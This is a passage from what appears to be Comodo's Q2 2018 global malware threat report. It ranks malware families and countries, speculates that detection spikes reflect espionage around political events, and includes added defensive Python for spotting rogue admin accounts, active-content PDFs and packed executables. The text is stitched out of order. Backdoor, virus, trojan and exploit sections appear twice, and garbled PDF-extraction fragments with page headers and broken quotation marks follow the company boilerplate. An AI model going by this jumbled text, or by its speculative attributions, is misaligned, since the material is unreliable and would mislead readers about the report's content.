The most common Backdoor that Comodo detected for Q2 2018 was DarkComet (also written Dark Komet, or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
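The behaviour attributed to Starter above (a new local account that is immediately added to the administrators group) leaves a characteristic pair of records in the Windows Security log: event 4720 (user account created) followed by event 4732 (member added to a security-enabled local group) for the BUILTIN\Administrators SID. The correlation below is an added example written for this report, not Comodo's or Microsoft's code; it assumes the log has already been exported to dicts with the standard event fields, and the four sample events are constructed.

```python
"""Correlate account creation (4720) with Administrators membership (4732).

Added example, not part of the report. Assumes Windows Security events are
available as dicts carrying EventID, TimeCreated (ISO 8601) and the event's
data fields. Event IDs 4720/4732 and the SID S-1-5-32-544 are the standard
Windows values; the sample events below are constructed.
"""
from datetime import datetime, timedelta

# Well-known SID of BUILTIN\Administrators (the group Starter targets).
ADMIN_GROUP_SIDS = {"S-1-5-32-544"}

# Constructed sample: one account elevated seconds after creation (suspicious),
# one elevated a day later by the helpdesk (ordinary provisioning).
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2018-06-02T03:14:05",
     "TargetUserName": "rsa_svc", "TargetSid": "S-1-5-21-1111-2222-3333-1105",
     "SubjectUserName": "alice"},
    {"EventID": 4732, "TimeCreated": "2018-06-02T03:14:09",
     "MemberSid": "S-1-5-21-1111-2222-3333-1105", "TargetSid": "S-1-5-32-544",
     "TargetUserName": "Administrators", "SubjectUserName": "alice"},
    {"EventID": 4720, "TimeCreated": "2018-06-02T09:00:00",
     "TargetUserName": "intern01", "TargetSid": "S-1-5-21-1111-2222-3333-1106",
     "SubjectUserName": "helpdesk"},
    {"EventID": 4732, "TimeCreated": "2018-06-03T10:00:00",
     "MemberSid": "S-1-5-21-1111-2222-3333-1106", "TargetSid": "S-1-5-32-544",
     "TargetUserName": "Administrators", "SubjectUserName": "helpdesk"},
]


def find_new_admin_accounts(events, window=timedelta(minutes=10)):
    """Return accounts that were created and made local administrator within
    `window`. Each hit records who performed the change so it can be triaged."""
    created = {}   # account SID -> (name, created_at, actor)
    hits = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (ev["TargetUserName"], ts, ev["SubjectUserName"])
        elif ev["EventID"] == 4732 and ev["TargetSid"] in ADMIN_GROUP_SIDS:
            rec = created.get(ev["MemberSid"])
            if rec and ts - rec[1] <= window:
                hits.append({"account": rec[0], "created": rec[1].isoformat(),
                             "elevated": ts.isoformat(), "actor": ev["SubjectUserName"]})
    return hits


if __name__ == "__main__":
    for hit in find_new_admin_accounts(SAMPLE_EVENTS):
        print(f"{hit['account']} created {hit['created']} and elevated "
              f"{hit['elevated']} by {hit['actor']}")
```

Matching on the member SID rather than the account name avoids being fooled by a look-alike name, and the time window is what separates malware-style provisioning from a helpdesk ticket worked the next day; widen it for a noisier environment and let the actor field drive the follow-up.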
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
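Since PDF files carried most of the quarter's exploit detections, a defender's first question about an inbound PDF is whether it contains the active-content features (JavaScript, open actions, launch actions, embedded files) that exploit documents rely on. The triage function below is an added example, not Comodo's code; it scans the raw bytes for those PDF name objects, decoding the `#xx` hex escapes that are sometimes used to disguise them. The two sample documents are constructed and are not real exploit files.

```python
"""Static triage of a PDF for active-content name objects.

Added example, not part of the report. Works on raw bytes only, so it will
not see names hidden inside compressed object streams; /ObjStm is therefore
reported separately as a reason to decompress before trusting a clean result.
"""
import re
from collections import Counter

# PDF name objects commonly associated with exploit documents.
RISKY_NAMES = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
               "/EmbeddedFile", "/RichMedia", "/XFA"}

# A name is a '/' followed by regular characters (no whitespace or delimiters).
NAME_RE = re.compile(rb"/[^\s()<>\[\]{}/%]+")


def normalize_name(raw: bytes) -> str:
    """Decode PDF '#xx' escapes so that /J#61vaScript compares equal to /JavaScript."""
    decoded = re.sub(rb"#([0-9A-Fa-f]{2})",
                     lambda m: bytes([int(m.group(1), 16)]), raw)
    return decoded.decode("latin-1")


def triage_pdf(data: bytes) -> dict:
    """Count risky names and report whether object streams could be hiding more."""
    counts = Counter()
    has_objstm = False
    for m in NAME_RE.finditer(data):
        name = normalize_name(m.group(0))
        if name in RISKY_NAMES:
            counts[name] += 1
        elif name == "/ObjStm":
            has_objstm = True
    return {"is_pdf": data.startswith(b"%PDF-"),
            "risky": dict(counts),
            "has_objstm": has_objstm}


def is_suspicious(report: dict) -> bool:
    """Flag any document that auto-runs script or launches something on open."""
    return bool(report["risky"])


# Constructed samples: a catalog with an OpenAction that runs (obfuscated) JavaScript,
# and a plain document with no active content.
SAMPLE_ACTIVE = (b"%PDF-1.4\n"
                 b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
                 b"3 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj\n"
                 b"trailer << /Root 1 0 R >>\n%%EOF\n")
SAMPLE_PLAIN = (b"%PDF-1.4\n"
                b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
                b"trailer << /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    for label, doc in (("active", SAMPLE_ACTIVE), ("plain", SAMPLE_PLAIN)):
        rep = triage_pdf(doc)
        print(label, "suspicious" if is_suspicious(rep) else "clean", rep["risky"])
```

A clean result from this scan is only meaningful when `has_objstm` is false; otherwise the objects have to be inflated first. Treat the output as a reason to detonate or strip the file, not as a verdict.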
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing, or "packing", it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. UPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, whose decompressor is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
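Stock UPX announces itself through its section names (UPX0, UPX1), but a modified packer such as MUPX usually renames them, so a useful packer check has to fall back on what packing does to the file: a section that occupies memory but has no bytes on disk, and a section whose contents are near-random. The scanner below is an added example, not Comodo's code; it parses the PE section table with the standard library and applies those three heuristics. The known packer section names are the ones I am confident of, and the three PE images are constructed by a small builder so the example runs offline without any real executable.

```python
"""Packer heuristics over a PE section table.

Added example, not part of the report. Heuristics: known packer section
names, sections with zero raw size but non-zero virtual size (unpacking
destination), and sections with Shannon entropy near 8 bits/byte
(compressed or encrypted payload). build_pe() constructs minimal test
images; they are not runnable programs.
"""
import math
import struct
from collections import Counter

# Section names used by well-known packers; a modified packer may rename them.
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata",
                         ".petite", ".MPRESS1", ".MPRESS2"}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 means every byte value is equally likely."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        name, vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, table + i * 40)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "virtual_size": vsize, "raw_size": rawsize,
                         "entropy": round(shannon_entropy(raw), 2)})
    return sections


def packer_indicators(pe: bytes, entropy_threshold: float = 7.0):
    """Return human-readable findings; an empty list means no packer signs."""
    findings = []
    for s in parse_sections(pe):
        if s["name"] in KNOWN_PACKER_SECTIONS:
            findings.append(f"known packer section name {s['name']}")
        if s["raw_size"] > 0 and s["entropy"] >= entropy_threshold:
            findings.append(f"high entropy {s['entropy']} in {s['name']}")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append(f"empty-on-disk section {s['name']} with "
                            f"{s['virtual_size']} bytes of virtual size")
    return findings


def build_pe(sections):
    """Construct a minimal PE32 image from (name, virtual_size, raw_bytes) tuples."""
    nsec, e_lfanew, opt_size = len(sections), 0x40, 0xE0
    headers_len = e_lfanew + 4 + 20 + opt_size + 40 * nsec
    raw_ptr = (headers_len + 0x1FF) & ~0x1FF          # 512-byte file alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    table, blobs, vaddr = b"", b"", 0x1000
    for name, vsize, raw in sections:
        ptr = raw_ptr + len(blobs) if raw else 0
        table += struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, len(raw), ptr,
                             0, 0, 0, 0, 0x60000020)
        blobs += raw
        vaddr += (max(vsize, len(raw)) + 0xFFF) & ~0xFFF
    image = dos + b"PE\0\0" + coff + opt + table
    return image + b"\0" * (raw_ptr - len(image)) + blobs


HIGH_ENTROPY = bytes(range(256)) * 4                 # exactly 8.0 bits/byte
PACKED_UPX = build_pe([(b"UPX0", 0x8000, b""), (b"UPX1", 0x1000, HIGH_ENTROPY)])
PACKED_RENAMED = build_pe([(b".text", 0x8000, b""), (b".rsrc", 0x1000, HIGH_ENTROPY)])
BENIGN = build_pe([(b".text", 0x300, b"\x55\x8b\xec\x83\xec\x10" * 50),
                   (b".data", 0x100, b"\0" * 256)])

if __name__ == "__main__":
    for label, img in (("upx", PACKED_UPX), ("renamed", PACKED_RENAMED), ("benign", BENIGN)):
        print(label, packer_indicators(img))
```

The renamed sample is the MUPX case: no recognisable names, yet the empty destination section and the 8.0-entropy payload still show. Entropy alone also fires on legitimately compressed resources or signed installers, so use it to prioritise sandboxing rather than to convict.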
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies would then have immediately begun to fulfill those requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Security Solutions Inc., Șoseaua Națională 31, Iași 700237, Romania (Europe). Tel +40 332 806 772
Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user, and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

